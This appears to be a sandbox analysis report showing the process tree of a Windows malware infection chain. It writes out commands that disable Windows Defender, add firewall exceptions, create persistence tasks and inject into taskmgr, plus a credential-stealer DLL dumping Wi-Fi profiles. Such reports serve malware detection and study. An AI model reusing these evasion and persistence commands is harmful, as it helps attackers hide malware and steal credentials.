-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2044 -s 8763⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe"C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe"C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe"4⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe"C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "RegAsm.exe"4⤵
-
C:\Windows\SysWOW64\choice.exechoice /C Y /N /D Y /T 35⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4064 -s 3643⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\1000149001\gold.exe"C:\Users\Admin\AppData\Local\Temp\1000149001\gold.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 684 -s 3643⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe"C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN NewB.exe /TR "C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe" /F3⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Local\Temp\1000152001\jok.exe"C:\Users\Admin\AppData\Local\Temp\1000152001\jok.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\1000153001\swiiii.exe"C:\Users\Admin\AppData\Local\Temp\1000153001\swiiii.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
- Checks processor information in registry
-
C:\Users\Admin\AppData\Local\Temp\1000238001\file300un.exe"C:\Users\Admin\AppData\Local\Temp\1000238001\file300un.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"3⤵
-
C:\Users\Admin\Pictures\QgtzpEAOWB6zbl9VfLb2HqcM.exe"C:\Users\Admin\Pictures\QgtzpEAOWB6zbl9VfLb2HqcM.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\u4bo.0.exe"C:\Users\Admin\AppData\Local\Temp\u4bo.0.exe"5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\u4bo.2\run.exe"C:\Users\Admin\AppData\Local\Temp\u4bo.2\run.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe6⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe7⤵
-
C:\Users\Admin\AppData\Local\Temp\u4bo.3.exe"C:\Users\Admin\AppData\Local\Temp\u4bo.3.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe"C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD16⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5604 -s 14125⤵
- Program crash
-
C:\Users\Admin\Pictures\RQgOZ9oytPXnDazWFumrc84r.exe"C:\Users\Admin\Pictures\RQgOZ9oytPXnDazWFumrc84r.exe"4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
-
C:\Users\Admin\Pictures\RQgOZ9oytPXnDazWFumrc84r.exe"C:\Users\Admin\Pictures\RQgOZ9oytPXnDazWFumrc84r.exe"5⤵
- Executes dropped EXE
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"6⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes7⤵
- Modifies Windows Firewall
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Users\Admin\Pictures\jhzxw4bTw0XNuv9c289x9RgQ.exe"C:\Users\Admin\Pictures\jhzxw4bTw0XNuv9c289x9RgQ.exe"4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
-
C:\Users\Admin\Pictures\jhzxw4bTw0XNuv9c289x9RgQ.exe"C:\Users\Admin\Pictures\jhzxw4bTw0XNuv9c289x9RgQ.exe"5⤵
- Executes dropped EXE
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"6⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes7⤵
- Modifies Windows Firewall
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe6⤵
- Executes dropped EXE
- Adds Run key to start application
- Manipulates WinMonFS driver.
- Drops file in Windows directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile7⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F7⤵
- Creates scheduled task(s)
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /delete /tn ScheduledUpdate /f7⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile7⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile7⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exeC:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll7⤵
- Executes dropped EXE
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F7⤵
- Creates scheduled task(s)
-
C:\Windows\windefender.exe"C:\Windows\windefender.exe"7⤵
- Executes dropped EXE
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)8⤵
-
C:\Windows\SysWOW64\sc.exesc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)9⤵
- Launches sc.exe
-
C:\Users\Admin\Pictures\biaVKzBpL112bRqSypIBjEkf.exe"C:\Users\Admin\Pictures\biaVKzBpL112bRqSypIBjEkf.exe"4⤵
- Modifies firewall policy service
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Pictures\j7efxmeQRKfsUQJlnU7k63nh.exe"C:\Users\Admin\Pictures\j7efxmeQRKfsUQJlnU7k63nh.exe" --silent --allusers=04⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
-
C:\Users\Admin\Pictures\j7efxmeQRKfsUQJlnU7k63nh.exeC:\Users\Admin\Pictures\j7efxmeQRKfsUQJlnU7k63nh.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.68 --initial-client-data=0x29c,0x2a0,0x2a4,0x278,0x2a8,0x6ea8e1d0,0x6ea8e1dc,0x6ea8e1e85⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\j7efxmeQRKfsUQJlnU7k63nh.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\j7efxmeQRKfsUQJlnU7k63nh.exe" --version5⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\Pictures\j7efxmeQRKfsUQJlnU7k63nh.exe"C:\Users\Admin\Pictures\j7efxmeQRKfsUQJlnU7k63nh.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=2176 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240428154725" --session-guid=4a8e1890-aba5-4aba-a88d-33df630f0702 --server-tracking-blob="OWNjMDA1NDIwMDIxNGM4YTE3YzA3M2EwYmQ4ODQxMjJhYWY3NWRhNjE4ZWZkM2FhMGVhMzNiMjdkODlhOGY4ZDp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2N19fNDU2Iiwic3lzdGVtIjp7InBsYXRmb3JtIjp7ImFyY2giOiJ4ODZfNjQiLCJvcHN5cyI6IldpbmRvd3MiLCJvcHN5cy12ZXJzaW9uIjoiMTAiLCJwYWNrYWdlIjoiRVhFIn19LCJ0aW1lc3RhbXAiOiIxNzE0MzE5MjM2Ljc5NzYiLCJ1dG0iOnsiY2FtcGFpZ24iOiI3NjdfXzQ1NiIsIm1lZGl1bSI6ImFwYiIsInNvdXJjZSI6Im1rdCJ9LCJ1dWlkIjoiMTRmN2Y1NjItZTZiNy00MWM0LThhMmMtZGVjMDc2Mzk5YzE1In0= " --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=60040000000000005⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
-
C:\Users\Admin\Pictures\j7efxmeQRKfsUQJlnU7k63nh.exeC:\Users\Admin\Pictures\j7efxmeQRKfsUQJlnU7k63nh.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.68 --initial-client-data=0x2a8,0x2ac,0x2b0,0x278,0x2b4,0x6dfae1d0,0x6dfae1dc,0x6dfae1e86⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404281547251\assistant\Assistant_109.0.5097.45_Setup.exe_sfx.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404281547251\assistant\Assistant_109.0.5097.45_Setup.exe_sfx.exe"5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404281547251\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404281547251\assistant\assistant_installer.exe" --version5⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404281547251\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404281547251\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.45 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x1056038,0x1056044,0x10560506⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\Pictures\umKW8PCP2RLAqU9q23aXwLM6.exe"C:\Users\Admin\Pictures\umKW8PCP2RLAqU9q23aXwLM6.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zS28B1.tmp\Install.exe.\Install.exe /WkfdidVYT "385118" /S5⤵
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Enumerates system info in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"6⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"7⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 68⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 69⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"7⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 68⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 69⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"7⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 68⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 69⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"7⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 68⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 69⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"7⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force8⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force9⤵
-
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force10⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV111⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"6⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True7⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True8⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True9⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "biPxHmULFllsbMgnpt" /SC once /ST 15:48:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS28B1.tmp\Install.exe\" Wt /xQndidJBlw 385118 /S" /V1 /F6⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn biPxHmULFllsbMgnpt"6⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵
-
C:\Windows\SysWOW64\cmd.exe/C schtasks /run /I /tn biPxHmULFllsbMgnpt7⤵
-
\??\c:\windows\SysWOW64\schtasks.exeschtasks /run /I /tn biPxHmULFllsbMgnpt8⤵
-
C:\Users\Admin\Pictures\LVcUqVorwfBjoqbrr5tyeOln.exe"C:\Users\Admin\Pictures\LVcUqVorwfBjoqbrr5tyeOln.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ce-installer_7.14.2_vbox-6.1.20.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ce-installer_7.14.2_vbox-6.1.20.exe5⤵
- Executes dropped EXE
-
C:\Windows\SYSTEM32\msiexec.exe"msiexec.exe" /qn /i VirtualBox-6.1.20-r143896.msi ADDLOCAL=VBoxApplication,VBoxPython VBOX_INSTALLDESKTOPSHORTCUT=0 VBOX_INSTALLQUICKLAUNCHSHORTCUT=0 /log "C:\Users\Admin\AppData\Local\Temp\charityengine-install-vbox-log.txt"6⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"3⤵
-
C:\Users\Admin\AppData\Local\Temp\1000239001\mstc.exe"C:\Users\Admin\AppData\Local\Temp\1000239001\mstc.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\1000239001\mstc.exe'3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'mstc.exe'3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\explorer.exe'3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'explorer.exe'3⤵
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "explorer" /tr "C:\Users\Admin\AppData\Roaming\explorer.exe"3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main2⤵
- Loads dropped DLL
-
C:\Windows\system32\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main3⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\netsh.exenetsh wlan show profiles4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\162180587977_Desktop.zip' -CompressionLevel Optimal4⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main2⤵
- Blocklisted process makes network request
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 2044 -ip 20441⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 4064 -ip 40641⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 684 -ip 6841⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 5604 -ip 56041⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon1⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS28B1.tmp\Install.exeC:\Users\Admin\AppData\Local\Temp\7zS28B1.tmp\Install.exe Wt /xQndidJBlw 385118 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"2⤵
-
